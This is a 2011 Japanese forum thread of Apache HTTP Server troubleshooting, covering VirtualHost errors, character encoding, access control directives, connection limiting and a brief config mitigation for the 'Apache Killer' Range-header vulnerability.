うだうだ書いてるヒマあったら他の管理者どもに話を訊けよアホ
あと設定ファイルの変更履歴とれやボケ

609:名無しさん@お腹いっぱい。
11/09/03 19:35:31.64
まずは管理体制の見直しからだな。

610:名無しさん@お腹いっぱい。
11/09/03 19:37:16.20
これを機にIISに切り替えよう。

611:名無しさん@お腹いっぱい。
11/09/03 22:37:24.77
>>607
どのブラウザでも一緒だね。
IP直打ちとVirtualHostで動作が違うってのがポイントだと思ってずっと調べてるけど、未だ解決できず。
>>608
confに変更はない。他の管理者は連絡とれず。やーここの人なら「そりゃおめー原因はあれだよ」ってなるかなと
思ってさ。自力で調べつつ、わらにもすがる思いで聞いとります。

612:名無しさん@お腹いっぱい。
11/09/03 23:28:57.17
>>611
config晒せば。

何らかの意図があって設定を変更しているのなら
設定を戻せば良いって話でもない気がするけど。

613:名無しさん@お腹いっぱい。
11/09/03 23:43:40.87
>>611

>IP直打ちとVirtualHostで動作が違うってのがポイントだと思ってずっと調べてるけど、未だ解決できず。
そこじゃないかもしれんぞな。

/js/jqueyr.js?test
↑↑↑↑
尻尾つきで、POSTするとどない?エラー?



614:名無しさん@お腹いっぱい。
11/09/04 00:07:46.90
>>613
こんな結果です。
[尻尾あり]
URLリンク(xxx.example.com)
POST /js/jquery.js?test HTTP/1.1
HTTP/1.1 404 Not Found
[尻尾なし]
URLリンク(xxx.example.com)
POST /js/jquery.js HTTP/1.1
HTTP/1.1 200 OK

615:名無しさん@お腹いっぱい。
11/09/04 00:42:20.85
>>614

POSTとGET関係ないと。

VirtualHostとの時だけ変なら、
試しに、違うドメインを追加(VirtualHost)して、そっちでも変になりますか?

差し障り範囲(ドメインとか、IPとかXXXして)で、confを見せていただけると、何か分かるかもね。
apacheバージョンとか、組み込んでるモジュールとか




616:名無しさん@お腹いっぱい。
11/09/06 07:41:07.60
遅ればせながらapache killer対策に取りかかっています
巨大なファイルを扱っていない限りrangeヘッダに非対応でもいいので

RequestHeader unset Range
RequestHeader unset Request-Range

二行追加でよろしいでしょうか?

617:名無しさん@お腹いっぱい。
11/09/06 08:16:43.48
バージョンチェックも入れました

<IfVersion < 2.2.20>
RequestHeader unset Range

RequestHeader unset Request-Range
</IfVersion>


618:名無しさん@お腹いっぱい。
11/09/06 14:25:04.79
話の流れに割り込むような形になってしまい申し訳ありませんが、Apache初心者の質問をさせてください。

Apacheにおける環境変数QUERY_STRINGの呼び出しに関する質問です。

Apache上に置いてあるshtml内にGETメソッドのフォームを設置しています。
フォームのテキストボックス内に日本語で文字を入力してsubmitボタンを押し、
新しく表示されたshtml内でSSIを使用して、cgiで環境変数QUERY_STRINGをshtml内に表示しようとしています。

テキストボックスに何も入力しない場合や半角英数字のみを入力した場合は正しく習得され、
cgiによってshtml内に環境変数QUERY_STRINGのデータがしっかりと表示されるのですが、
テキストボックス内に日本語を入力した場合は、shtml内に環境変数QUERY_STRINGの中身が
何もない状態であるかのように表示されてしまいます。つまり、『?』以降が何も表示されないということです。
しかし、テキストボックス内に日本語を入力した場合でも、新しく表示されたshtmlのURLには入力した文字データが
GETメソッドとして正常に受け取られているように表示されています。

AN HTTPDで全く同じshtmlおよびcgiを使用した場合は、日本語を入力してもshtml内にその結果が正しく表示されるので、
Apache内の何かが原因であるのではないかなと考えているのですが、よく分かりません。

お分かりになる方おられましたら、どうかよろしくお願いします。

619:名無しさん@お腹いっぱい。
11/09/06 15:35:20.59
謙譲語・・

620:名無しさん@お腹いっぱい。
11/09/06 18:18:46.32
それはわかっておりますw

shtmlがUTF-8じゃないんだろw

621:名無しさん@お腹いっぱい。
11/09/06 21:31:32.29
>>598
LogLevel debug を設定したらヒントが出るかもしれない。

622:名無しさん@お腹いっぱい。
11/09/06 21:36:14.32
連投ですまん。
あと、>>596 を見て思うのは、
huge.shit.com/test.php?param=xxx のときは
"test.php?param=xxx" というファイルを探しに行ってるんじゃないかと・・・

まぁ、バーチャルホスト内の設定のどこかがおかしいんだろう。
あとは .htaccess が置いてあったりとか。

623:618
11/09/07 01:01:45.37
>>620

おっしゃるとおり、shtmlはUTF-8ではなくShift_JISで作成したものです。
UTF-8のページにしたところ、日本語のデータを表示することができました。
ありがとうございました。

GETを受けるページがUTF-8でなければならないのは、Apacheの仕様なのですか?
Shift_JISでも表示できるように、設定で変更することなどは可能ですか?
AN HTTPDではshtmlがShift-JISで書かれていてもちゃんと表示されていたので、
Apacheだとなぜ表示されないのかよく分からないのですが・・・。

624:名無しさん@お腹いっぱい。
11/09/07 11:43:32.18
>>622

?が全角

625:名無しさん@お腹いっぱい。
11/09/07 12:34:26.14
まさかぁ。

626:名無しさん@お腹いっぱい。
11/09/12 16:53:37.17
>>596
その後どうよ。

627:名無しさん@お腹いっぱい。
11/09/13 14:52:27.40
2.2.21とな

628:名無しさん@お腹いっぱい。
11/09/13 16:36:44.83
Apache Killerの余韻はこの辺か > 2.2.21

*) Fix a regression introduced by the CVE-2011-3192 byterange fix in 2.2.20.
PR 51748. [<lowprio20 gmail.com>]

*) core: Allow MaxRanges none|unlimited|default and set 'Accept-Ranges: none'
in the case Ranges are being ignored with MaxRanges none.
[Eric Covener]


629:名無しさん@お腹いっぱい。
11/09/20 12:59:10.14
こんにちは。質問させてください。

お名前.comでドメイン取得
さくらvpsを契約し

var/www/html/rails_app/public
をドキュメントとして
URLリンク(example.com)<)
にアクセスしたときだけ
phpmyadminが表示されるようにするには
どのような設定をすればいいでしょうか?

630:名無しさん@お腹いっぱい。
11/09/20 13:16:50.42
スレリンク(linux板:407番)
の人?

631:名無しさん@お腹いっぱい。
11/09/23 16:36:44.12
ソースからRPMを作ろうとしています
ソース同梱のspecファイル中に
# symlinks for /etc/httpd
とあって、logやrunやmodulesのシンボリックリンクを作ってるんですが
/etc/httpd配下にそんなシンボリックリンクいらなくないですか?
どういう意味があるんでしょうか

632:名無しさん@お腹いっぱい。
11/09/23 18:05:23.72
>>631
いらないと思うなら作る必要はない。
歴史的に /etc 配下に設定ファイルを集めているだけ
/etc の配下に httpd があれば、設定ファイルを探しやすいってだけだ

/usr/local/httpd とかに全部入れる人だっているんだし
自分だけが触るなら別に何でも良いじゃないの?

他人が触るなら /etc/httpd があった方が、親切

633:名無しさん@お腹いっぱい。
11/09/26 10:23:38.12
redhat 系では ServerRoot が /etc/httpd になっているので、
symlink がないとモジュールの場所はじめありとあらゆるものが
相対パスで書けなくなるんだよ。


634:名無しさん@お腹いっぱい。
11/09/26 17:31:11.27
そういう気遣いもドキュメントとか無いサーバいじるときは
$ ps -ef|egrep 'http|apache'
$ /usr/sbin/apache2 -V

って感じでたどっていくね><

635:名無しさん@お腹いっぱい。
11/09/26 17:41:29.86
話ずれてきたな。

636:名無しさん@お腹いっぱい。
11/09/29 21:04:06.24
httpd.confでアクセス制限をやろうとしています。
「localhost:8080」からのみアクセス許可したいのですができません。

Order allow,deny
Allow from localhost:8080

とやるとエラーが出てApacheが起動しなくなります。
どなたかご教授を・・。

637:名無しさん@お腹いっぱい。
11/09/29 21:14:13.21
添付ドキュメント読んでこい

638:名無しさん@お腹いっぱい。
11/09/29 21:15:50.25
どこの馬の骨かわからん奴に教授などする気はない。

639:名無しさん@お腹いっぱい。
11/09/29 21:45:40.32
お父さんキツイっす

640:636
11/09/29 21:56:31.63
該当しそうな箇所を読んだけど載ってませんでした。
ポートを指定した場合のケースはググっても見つからないのよ。。

641:名無しさん@お腹いっぱい。
11/09/29 22:39:15.28
>>640
そのポートで Listen してるんよね。
そしたら、localhost だけAllow にして...
後は、分かるよな。


642:名無しさん@お腹いっぱい。
11/09/29 22:46:21.35
>>641
それだと403エラーとなってしまいます。

Forbidden

You don't have permission to access / on this server.

<Directory "C:/xampp/Apache/htdocs">
Allow from All
</Directory>

にしたり、Listenを80にすれば普通にアクセスできるのですが。

643:名無しさん@お腹いっぱい。
11/09/29 23:05:06.03
やりたいことを正しく表現できないお馬鹿さんであり
充実したドキュメントがあっても理解できないお馬鹿さんでもあるという
そんなかんじ?

644:名無しさん@お腹いっぱい。
11/09/29 23:29:33.45
中学校で習うだろ。

645:636
11/09/29 23:32:43.56
>>642
>Listenを80にすれば普通にアクセスできる
これは間違いでした。以下の設定で「URLリンク(localhost)」にアクセスしても
403エラーとなります。

Listen 80
ServerName localhost:80
<Directory />
Options FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
</Directory>
<Directory "C:/xampp/Apache/htdocs">
Options Indexes FollowSymLinks
AllowOverride None
Order allow,deny
Allow from localhost
</Directory>

Allow from localhostの部分をAllow from Allとすると「It works!」と出て接続できます。
ポート関係なしにlocalhostからのみアクセス許可することもできません。

646:名無しさん@お腹いっぱい。
11/09/29 23:42:45.12
>>645

ちょっと、落ち着け。

403になるなら、
DocumentRoot はどこかね。



647:名無しさん@お腹いっぱい。
11/09/29 23:55:10.08
>>646
済みません、やはり最初ので正しいです。
>>645キャッシュが原因で403エラーとなっていたようで、クイック起動バーから
新しいウィンドウを開くと「It works!」と出て接続できます。
Allow from localhostで「URLリンク(localhost)」はOKということです。

ポートを8080にして「URLリンク(localhost:8080)」でアクセスすると403エラーとなります。
全ブラウザを閉じてからアクセスして確認しました。

Listen 8080
ServerName localhost:8080
<Directory />
Options FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
</Directory>
<Directory "C:/xampp/Apache/htdocs">
Options Indexes FollowSymLinks
AllowOverride None
Order allow,deny
Allow from localhost
</Directory>

DocumentRoot "C:/xampp/Apache/htdocs"

648:名無しさん@お腹いっぱい。
11/09/30 00:10:00.39
>>647
8080 でアクセスするとき、error_log に何て出てる?


649:名無しさん@お腹いっぱい。
11/09/30 00:31:32.37
>>648

たくさんあってどれを挙げればいいかわからないんですがこんな感じのがありました。

[Fri Sep 30 00:12:17 2011] [notice] Child 7976: Starting thread to listen on port 8080.
[Fri Sep 30 00:12:38 2011] [error] [client 127.0.0.1] client denied by server configuration: C:/xampp/Apache/htdocs/
[Fri Sep 30 00:13:50 2011] [notice] Parent: Received restart signal -- Restarting the server.
[Fri Sep 30 00:13:50 2011] [notice] Child 7976: Exit event signaled. Child process is ending.
httpd.exe: Could not reliably determine the server's fully qualified domain name, using 192.168.1.2 for ServerName

それとWindowsファイアウォールを今調べているところです。

650:名無しさん@お腹いっぱい。
11/09/30 00:41:01.39
エラーログを削除して真っさらにしてやってみました。

[Fri Sep 30 00:38:36 2011] [notice] Parent: Received restart signal -- Restarting the server.
[Fri Sep 30 00:38:36 2011] [notice] Child 6636: Exit event signaled. Child process is ending.
[Fri Sep 30 00:38:36 2011] [notice] Apache/2.2.21 (Win32) configured -- resuming normal operations
[Fri Sep 30 00:38:36 2011] [notice] Server built: Sep 9 2011 10:26:10
[Fri Sep 30 00:38:36 2011] [notice] Parent: Created child process 4464
[Fri Sep 30 00:38:37 2011] [notice] Child 4464: Child process is running
[Fri Sep 30 00:38:37 2011] [notice] Child 4464: Acquired the start mutex.
[Fri Sep 30 00:38:37 2011] [notice] Child 6636: Released the start mutex
[Fri Sep 30 00:38:37 2011] [notice] Child 4464: Starting 64 worker threads.
[Fri Sep 30 00:38:37 2011] [notice] Child 4464: Starting thread to listen on port 8080.
[Fri Sep 30 00:38:45 2011] [notice] Child 6636: All worker threads have exited.
[Fri Sep 30 00:38:45 2011] [notice] Child 6636: Child process is exiting
[Fri Sep 30 00:39:02 2011] [error] [client 127.0.0.1] client denied by server configuration: C:/xampp/Apache/htdocs/

651:名無しさん@お腹いっぱい。
11/09/30 00:45:16.71
>>650
そこに 403 の原因が書いてるではないか。

652:636
11/09/30 01:11:25.26
今日はもう無理なので寝ます。
いろいろググってみたので明日やってみます。
ヒントを下さってありがとうございました。

653:名無しさん@お腹いっぱい。
11/09/30 02:24:50.28
unixちゃうやん!Windowsやん!板違いやん!

Apache統合スレ 11 (HTTPServer以外も含む)
スレリンク(mysv板)

654:名無しさん@お腹いっぱい。
11/09/30 02:33:04.31
>>636
8080はdst portだろ。

655:名無しさん@お腹いっぱい。
11/09/30 09:40:34.35
これはひどい。

656:名無しさん@お腹いっぱい。
11/09/30 10:35:16.09
あるのか知らんが初心者スレに書いたほうがよかったな

657:名無しさん@お腹いっぱい。
11/10/01 11:17:49.27
接続数制限とかだと最近じゃmod_vlimitというやつが結構良いが使ってる人いる?
ファイル単位で接続数制限かけたいと思ってる

658:名無しさん@お腹いっぱい。
11/10/09 17:03:05.04
>>657
しらね。
それ系のは、mod_statusのスコアボード見て各プロセスやスレッドが
その瞬間に処理してるURLの中から単純にマッチするものを
カウントしてるだけだから、動作的にはほとんど問題ないかと。

注意すべき点としては、MaxClientsみたいな同時アクセス数の数値を
あまり大きくしている場合は、カウントしなければならない対象も
かなりの数になるんで、オーバーヘッドが高くなる(かも)ってことぐらいかな?

関係ないが、今度はまたmod_proxyにセキュリティホールかw

659:名無しさん@お腹いっぱい。
11/10/11 21:02:51.77
とりあえずpatch当てた…

660:名無しさん@お腹いっぱい。
11/10/16 14:13:43.19
>>658
ファイル単位で同時接続数見るのはスコアボードじゃできないよ

661:名無しさん@お腹いっぱい。
11/10/18 07:36:25.84
nginxスレってないの?

662:名無しさん@お腹いっぱい。
11/10/18 07:45:13.62
ないよ。

663:名無しさん@お腹いっぱい。
11/10/18 16:28:25.06
>>661
立てろ

664:名無しさん@お腹いっぱい。
11/10/19 06:50:34.73
いやん

665:名無しさん@お腹いっぱい。
11/10/19 11:39:18.13
Apacheも最初は読み方が分からなかったが
nginxも相当ぶっとんでるな。

666:名無しさん@お腹いっぱい。
11/10/19 12:37:28.55
>>665
「にんじんx」?

667:名無しさん@お腹いっぱい。
11/10/19 13:10:55.14
>>666
惜しい!

668:名無しさん@お腹いっぱい。
11/10/19 13:58:21.86
Apacheは普通の英単語じゃん。

669:名無しさん@お腹いっぱい。
11/10/21 11:18:08.93
>>660
あれ?そうだっけ?
Extend何とかの設定入れたら取れたと思ったが… 記憶違いかな。
ってか、スコアボードで取れないとしたら他にどんな実装があるっけ?
モジュール自前で共有メモリに書き出して管理するぐらいだろうか。

670:名無しさん@お腹いっぱい。
11/10/22 11:04:10.65
Connection closed by foreign host.
telnetして数秒たつとこうなるんだけど
これ無効にしたり、時間伸ばしたりできないの?
教えてください

671:名無しさん@お腹いっぱい。
11/10/22 11:33:46.52
ちゃんと説明できないバカは一昨日来ればいいと思うの

672:名無しさん@お腹いっぱい。
11/10/22 11:43:47.08
教えてください
apacheにtelnetし接続して8秒ほどたつと
Connection closed by foreign host.
と出ます教えてください

673:名無しさん@お腹いっぱい。
11/10/22 11:48:15.88
タイムアウト値を変更したいのかなぁ・・・

674:名無しさん@お腹いっぱい。
11/10/22 13:41:49.24
>>670
なんでそんなことしたいの。

675:名無しさん@お腹いっぱい。
11/10/22 14:09:58.39
デフォルト設定のままインターネットに公開はキツいからなぁ
パフォーマンスチューニング系の話題は良い感じに纏めてる先人が多数いらっしゃるから

ググれカス

676:名無しさん@お腹いっぱい。
11/10/22 16:15:19.35
>>669
スコアボードにr->filenameは保存されない。
なので、ファイル単位で同時接続数調べようと思ったら子プロセス同士でプロセス間通信しないとだめ。

677:名無しさん@お腹いっぱい。
11/10/22 16:17:07.10
そういう意味では>>657は良くできてる

678:名無しさん@お腹いっぱい。
11/10/22 16:42:08.96
わからねーのかよ使えねーなクソ

679:名無しさん@お腹いっぱい。
11/10/22 17:43:43.89
>>678
tcpのセッションの話とapacheのタイムアウトは別物。

680:名無しさん@お腹いっぱい。
11/10/22 19:20:35.40
コマンド手打ちしたいけどタイピングが超遅いのであろう

681:名無しさん@お腹いっぱい。
11/10/23 10:39:49.42
先日サーバをレンタルしたのですが
ページ自体が自分の期待する文字コードでファイルを返してくれません。

具体的には、 hoge.html というhtmlページは shift-jis で記述しており
shift-jisで閲覧される事を想定しているのですが、utf-8としてコンテンツが吐き出されている様です。


たとえば、 下記の様な特定のディレクトリにあるファイルのみ(←重要★)
文字コードを変更するにはどうすればよいでしょうか?
hoge_dir/hoge/
hoge_1.html
hoge_2.html

682:名無しさん@お腹いっぱい。
11/10/23 12:09:59.37
<Directory ...>
AddDefaultCharset ...
</Directory>


683:名無しさん@お腹いっぱい。
11/10/23 12:59:36.51
>>682
次の2パターンを試してもやはり駄目でした。どこに問題があるのでしょうか?

hoge_dir/hoge/
 .htaccess
 hoge_1.html
 hoge_2.html

【.htaccessの設定】
その①
<Directory .>
AddDefaultCharset Shift_JIS
</Directory>

その②
AddType "text/html; charset=Shift_JIS" sjis

684:名無しさん@お腹いっぱい。
11/10/23 13:13:27.27
><Directory .>

アホか。よく考えろ。


685:名無しさん@お腹いっぱい。
11/10/23 13:18:15.60
>>684

そもそも <Directory>はhttpd.cnf とかにしか指定出来ないのではないでしょうか?

うーん文字化けしてしまう。
html ⇒ php にして文字コードを指定すれば文字化けしないんですけど・・・

686:名無しさん@お腹いっぱい。
11/10/23 18:50:21.11
HTMLヘッダーとHTTPヘッダーと両方確認した?

687:名無しさん@お腹いっぱい。
11/10/24 02:40:40.53
AddType "text/html; charset=Shift_JIS" html
とかじゃないの

そのhtmlをUTF-8にするのはだめなん?

688:名無しさん@お腹いっぱい。
11/10/24 14:17:58.37
>>687
AddCharsetというディレクティブもあることも知らずに回答者気取りとかww

689:名無しさん@お腹いっぱい。
11/10/24 14:35:40.54
スレ維持乙

690:名無しさん@お腹いっぱい。
11/10/25 05:37:52.42
デフォルトチャーセットってノンに出来ないっけ?
こんなの設定してる鯖屋は萎えるな。

691:名無しさん@お腹いっぱい。
11/10/26 05:19:30.01
二つのhttpd.confを比較して、
設定の差分をリストアップするようなソフトがあればおしえてください

692:名無しさん@お腹いっぱい。
11/10/26 05:27:59.24
>>691
ん?こーゆーの?
URLリンク(www.geocities.co.jp)


693:名無しさん@お腹いっぱい。
11/10/26 08:28:10.87
>>691
diffコマンド


694:名無しさん@お腹いっぱい。
11/10/26 10:31:02.56
>>693
ちゃんと-uつけろよ?

695:名無しさん@お腹いっぱい。
11/10/26 14:24:34.91
>>690
AddDefaultCharset noneって見ただけで笑えるよねw
noneって設定値はcharset=noneの設定だからw

696:名無しさん@お腹いっぱい。
11/10/26 20:56:51.64
ノンじゃなくてオフならあるぜ

697:名無しさん@お腹いっぱい。
11/10/26 21:05:11.46
ナン、て中学校で習ったな

698:名無しさん@お腹いっぱい。
11/10/26 22:01:20.31
おフランス風ざますのよ

699:名無しさん@お腹いっぱい。
11/10/26 22:16:13.59
うぃ

700:名無しさん@お腹いっぱい。
11/10/26 23:51:55.89
ぐぐるな

701:名無しさん@お腹いっぱい。
11/10/27 10:28:11.25
管理用のIPアドレスからアクセスしてきたら環境変数をセット
その環境変数があれば、指定のディレクトリへのアクセスを許可
ということをやりたいのですが、
環境変数を元にallowするにはどうすればいいですか?

702:名無しさん@お腹いっぱい。
11/10/27 10:32:12.13
>>701
っ SetEnvIf

703:名無しさん@お腹いっぱい。
11/10/27 10:33:39.14
または、類似の方法があれば教えてください
管理用のIPアドレス表記があちこちにあるのを避けたいんです

704:名無しさん@お腹いっぱい。
11/10/27 10:34:29.90
>>702
ありがとうございます。
SetEnvIfを使って、環境変数のセットをするところまではきたのですが
その先がわからないんです・・

705:名無しさん@お腹いっぱい。
11/10/27 10:44:03.98
アクセスコントロールしたいコンテンツをまとめるとか
.htaccessをリンクで増やして実体は一つにするとか

706:名無しさん@お腹いっぱい。
11/10/27 10:47:43.34
Allow from all|host|env=env-variable [host|env=env-variable] ...

707:名無しさん@お腹いっぱい。
11/10/27 11:00:51.75
>>706
あーこれです!
ありがとうございました

708:名無しさん@お腹いっぱい。
11/10/27 11:57:06.57
mod_layoutってなくなりました?
URLリンク(www.tangent.org)
ここが開発元っぽいけど情報がない

709:名無しさん@お腹いっぱい。
11/10/27 12:17:13.00
ただのしかばねのようだ
URLリンク(hg.tangent.org)

710:名無しさん@お腹いっぱい。
11/10/27 14:10:12.36
>>709
ありがとうございます
日付的に更新とまってるのかな?

711:名無しさん@お腹いっぱい。
11/10/29 23:57:40.29
mod_layoutを必要とするようなサービスは時代の流れから反してるからね

712:名無しさん@お腹いっぱい。
11/10/31 23:15:51.05
質問させて頂きます。
httpd.confで、VirtualHostを設定しているのですが、
複数のドメインのサブドメインをアスタリスク等で一度に設定できますか?

例えば
hoge.comの場合
www.hoge.com → DocumentRoot /home/hoge/www/
aaa.hoge.com → DocumentRoot /home/hoge/www2/
bbb.hoge.com → DocumentRoot /home/hoge/www3/

hoge.jpの場合
www.hoge.jp → DocumentRoot /home/hoge/www/
aaa.hoge.jp → DocumentRoot /home/hoge/www2/
bbb.hoge.jp → DocumentRoot /home/hoge/www3/

違うドメインですが、
サブドメインが一緒の場合、同じDocumentRootにしたいのです。

一つ一つ設定するよりも、正規表現ぽく設定したいのですが・・
よろしくおねがいします。

713:名無しさん@お腹いっぱい。
11/10/31 23:21:29.40
hoge.comの中の人ってhoge.jpの管理者と同じ日本人だったのか・・


次ページ
最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch